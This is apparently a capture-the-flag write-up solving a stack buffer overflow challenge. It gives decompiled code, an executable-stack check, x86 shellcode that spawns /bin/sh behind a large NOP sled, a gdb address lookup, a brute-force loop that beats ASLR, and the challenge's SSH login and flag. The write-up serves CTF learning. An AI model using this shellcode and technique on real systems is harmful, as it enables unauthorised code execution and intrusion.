Category: pwnables
This time, let’s attack /opt/pctf/z2/exploitme.
ssh username@a5.amalgamated.bizUsername: z2_1
Password: 29rpJinvpwoI7pzdufQc4h6edzvyh
Summary: buffer overflow, static binary
int main(int a1, int a2) { char v3; // [sp+1Ch] [bp-204h]@7 unsigned int v4; // [sp+21Ch] [bp-4h]@4 if ( a1 != 2 ) { printf("%s requires one arguments.\n", *(_DWORD *)a2); exit(1); } v4 = strtoul(*(_DWORD *)(a2 + 4)); if ( v4 > 0x1FF ) { if ( log_error((int)"[assertion] len < sizeof(buffer)") ) myexit(2); } fgets_unlocked(&v3, v4, stdin); puts(&v3); return 0; }
Hmm, an interesting thing: when given size is too large, exit(2) is called only when log_error returned not 0. Let’s check if it works:
z2_1@a5:~$ perl -e 'print "A"x1024;' | /opt/pctf/z2/exploitme 1024 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ... Segmentation fault
Yeah, buffer is overflowed. Let’s check for nx:
smallbug2 $ execstack -q binary X binary
Cool, nx bit is not set. Unhappily ASLR is presented, but we can make a huge nopsled and make some tries:
z2_1@a5:~$ export SC="`perl -e 'print "\x90"x64000 . "\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58 \xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f \x62\x69\x89\xe3\x89\xd1\xcd\x80";'`"
Get one of possible addresses:
z2_1@a5:~$ perl -e 'print "A"x1024;' >input z2_1@a5:~$ gdb /opt/pctf/z2/exploitme (gdb) r 1024 <input (gdb) p/x $esp+20000 $1 = 0xbfdea7b0
Run!
z2_1@a5:~$ while [ 0 ]; do (perl -e 'print "\xb0\xa7\xde\xbf"x256;'; echo; cat) | /opt/pctf/z2/exploitme 1024; done
After ~20 segfaulis we get a shell:
id uid=2000(z2_1) gid=1001(z2users) egid=1003(z2key) groups=1001(z2users) cat /opt/pctf/z2/key This is the key: EASTEREGGHUNTS_ARE_FUN
The flag: EASTEREGGHUNTS_ARE_FUN
